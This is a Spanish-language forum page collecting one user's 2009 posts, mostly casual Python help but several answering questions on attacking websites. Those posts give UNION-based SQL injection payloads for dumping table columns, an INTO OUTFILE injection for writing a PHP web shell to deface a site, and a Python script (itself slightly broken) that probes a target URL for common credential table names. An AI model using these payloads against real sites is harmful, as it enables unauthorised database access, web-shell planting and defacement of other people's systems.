Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - 08l00D

#131
Cita de: taul en 30 Septiembre 2009, 02:29 AM
Primero quiero pedirles perdon a toda su comunidad por mocos q me heche cuando era mas pendejo, fui borrado de la db.espero tener otra oportunidad en esta comunidad.


Cita de: taul en  9 Diciembre 2009, 00:44 AM
Gente como veran no pertenesco a esta comunidad por lo que no conozco quien es el admin de este sitio

:rolleyes:
#132
Nivel Web / Re: duda sql injection
27 Septiembre 2009, 23:20 PM
-1+union+select+1,2,3,4,nombrecolumna,6,7,8,9,10,11,12+from+alumnos+limit+0,1--
si queres saber el valor de varias a la vez las concatenas...
-1+union+select+1,2,3,4,concat_ws(0x3a,nomnbrecolumna,otronombrecolumna,etc),6,7,8,9,10,11,12+from+alumnos+limit+0,1--

#133
Cita de: Diego Arenas en  7 Septiembre 2009, 23:23 PM
"Tutorial Como Descargar De Rapidshare"

http://rapidshare.com/files/263475908/Tutorial_Como_Descargar_De_Rapidshare_By_Diego_Arenas.rar
Jaja es chiste no¿?
Como se supone que el que no sabe descargar de rapidshare se pueda bajar el manual si lo subiste a rapidshare xD
#134
Nivel Web / Re: sql injection y luego deface
13 Septiembre 2009, 02:33 AM
Cita de: Darioxhcx en 13 Septiembre 2009, 00:34 AM
Cita de: 08l00D en 13 Septiembre 2009, 00:21 AM
podes probar hacer en la inyeccion un INTO + OUTFILE ... ejemplo: ->
UNION SELECT "codigo malicioso" INTO OUTFILE "PATH/shell.php"
para esto debes procurar que las magic_quotes no este habilitada asi no tienes problemas con las comillas ....

Cita de: rower85 en 13 Septiembre 2009, 00:07 AM
mmm considerando que es siempre para http? o sea siempre accediendo desde el puerto 80? leí algo sobre subir una shell puede ser? donde podría encontrar más info sobre esto? o si me pueden ayudar por acá mejor, lo que encontré pasa muy por arriba esta parte, la mayoría se centra en las inyecciones
lo que vos decis es sacar la contraseña y usuario de un panel de administracion?
en ese caso te logueas y buscas un upload de imagenes o de lo que sea y uploadeas la shell haciendo un bypass si es necesario ....
tengo una duda...
no hai que ser root para poder crear una shell ?
nunca me salio eso xD


http://milw0rm.com/video/watch.php?id=88

saludos
No necesariamente lo que si tenes que contar con permisos de lectura y escritura en la carpeta donde vas a escribir y ademas el usuario debe tener el privilegio FILE... despues de eso ya lo podes hacer tambien tenes que sacar el documentroot pero eso es facil con poner con pasarle una ' en donde estas inyectando te deberia mostrar todo el path ... (en la mayoria de los casos xD)
es dificil encontrar un server con dicha configuracion de mysql y php.....
#135
Nivel Web / Re: sql injection y luego deface
13 Septiembre 2009, 00:21 AM
podes probar hacer en la inyeccion un INTO + OUTFILE ... ejemplo: ->
UNION SELECT "codigo malicioso" INTO OUTFILE "PATH/shell.php"
para esto debes procurar que las magic_quotes no este habilitada asi no tienes problemas con las comillas ....

Cita de: rower85 en 13 Septiembre 2009, 00:07 AM
mmm considerando que es siempre para http? o sea siempre accediendo desde el puerto 80? leí algo sobre subir una shell puede ser? donde podría encontrar más info sobre esto? o si me pueden ayudar por acá mejor, lo que encontré pasa muy por arriba esta parte, la mayoría se centra en las inyecciones
lo que vos decis es sacar la contraseña y usuario de un panel de administracion?
en ese caso te logueas y buscas un upload de imagenes o de lo que sea y uploadeas la shell haciendo un bypass si es necesario ....
#136
Scripting / Re: Distribuir mi programa
7 Septiembre 2009, 02:33 AM
Si usa Windows que se descargue el interprete o vos podes usar por ejemplo py2exe y lo convertis en un ejecutable para que pueda ejecutarlo sin tener el interprete instalado....
Si usa GNU/Linux (la mayoria de las distribuciones lo traen instalado) pasale el codigo que lo ponga cree un archivo .py pegue el codigo y lo ejecute ... ~$ python programa.py
xD no entiendo como andas programando en python y preguntes eso  :P
#137
Scripting / Re: [Python] optparse
18 Agosto 2009, 21:41 PM
No, optparse de por si trata todos los argumentos como opcionales no puedes poner que tal parametro sea obligatorio y tales otros no... todos son opcionales... por ahi eh visto que tocando un poco el code de una clase de ese modulo podias ponerle vos esa opcion, pero ya de por si optparse no te brinda soporte para lo que quieres.
Igualmente tenes dentro del standar a getopt que me parece que si lo podes hacer en la documentacion oficial hay documentacion acerca de el...

Saludos
#138
if __name__ == "__main__"
Esa comparacion es como si el modulo(donde este escrita) diga:
Si no eh sido importado hacer lo siguiente...

Yo diria que se deberia usar cuando haces un script que puede ser importado o no y se ejecute por si mismo....
por ejemplo imaginate que tienes un script con varias funciones y quieres que tu script pueda ser importado y las funciones puedan ser manejadas por otro modulo y quieres que tambien que si lo ejecutas directamente ejecute tal y tal funcion....
entonces pones el condicional.....
if __name__ == "__main__": #si me ejecuto directamente
      funcion1(arg1, arg2) #ejecutar funcion1
      funcion2()
      .....

si hicieras el programa para que solo se ejecute directamente y no sea necesario utilizarlo como modulo de importacion no es necesario usarlo ya que directamente para ejecutar tus propias funciones y usar tus propias clases dentro de tu script las llamas desde ahi, por ejemplo tienes

def sumar(num1, num2):
    return num1 + num2

def restar(num1, num2):
    return num1 - num2

resultado = sumar(5, 7) #estas ejecutando las funciones del modulo directamente

si este modulo es importado el interprete ejecutaria esa la sentencia "resultado = sumar(5, 7)" en el modulo que lo importo sin preguntarle si quiera al que lo importo si queria llamar a esa funcion....
entonces seria conveniente ponerle ese if ahi .... osea:

def sumar(num1, num2):
    return num1 + num2

def restar(num1, num2):
    return num1 - num2

if __name__ == '__main__': #si nos estamos ejecutando solos
    resultado = sumar(5, 7) #realizar mi suma


si el modulo es importado el valor del modulo deja de ser __main__ y pasa a ser el nombre del modulo por lo que si es importado la condicion no se cumple y por lo tanto no se ejecuta nuestra llamada a la funcion..

pd: tal vez no se note tanto el uso en el ejemplo de m... ese q puse pero creeme que es muy util ...

Saludos !
#139
Scripting / Re: python y tabla HTML
16 Agosto 2009, 07:22 AM
Un muy buen parser de html para python es BeautifulSoup para lo que pides es mas que suficiente  :)
#140
Nivel Web / Re: (DUDA) Haciendo SQL Injection.
30 Julio 2009, 02:10 AM
bueno basicamente seria algo asi.... esta en python
Código (python) [Seleccionar]

import urllib2

url = raw_input("Introduce la url + el path vulnerable\n\tejemplo: www.ejemplo.com/xxxx.php?id=\n")

tablas = ['admin','tblUsers', 'tbl_users', 'tbl_admin',,'tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table',
'miembro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass',
'user_password', 'usua_login','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email',
'user_emails','user_mail','user_mails','mail','emails','email','address',
'e-mail','emailaddress','correo','correos','phpbb_users','log','logins',
'login','registers','register','usr','usrs','ps','pw','un','u_name','u_pass',
'u_password','nick','nicks','manager','managers','administrador',
'administradores','clave','login_id','pwd','pas','sistema_id',
'sistema_usuario','sistema_password','contraseña','auth','key','senha',
'tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','tb_users','tb_user','tb_sys','sys',
'fazerlogon','logon','fazer','authorization','membros','utilizadores','staff','nuke_authors',
'accounts','account','accnts','accnt','customers','customer','membres','administrateur','utilisateur','utilisateurs',
'password','passwords','amministratore','god','God','authors','autores','membername','usuario','Users','Admin','Members',
'Miemberos','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER', 'username', 'user_hash']

inyeccion = "-11+union+select+1,2,3,4,5,6,7+from+"

for tabla in tablas:
web = urllib2.urlopen(url + inyeccion + tabla)
source = web.read()
error = "Table 'emotiu." + str(tabla) + "' doesn't exist"
if not error in source:
print "Tabla %s se encuentra en la base de datos" % tabla

print "Fin xd"



Por cierto la lista de tablas esa no es mia la saque de otro script que vi por ahi ....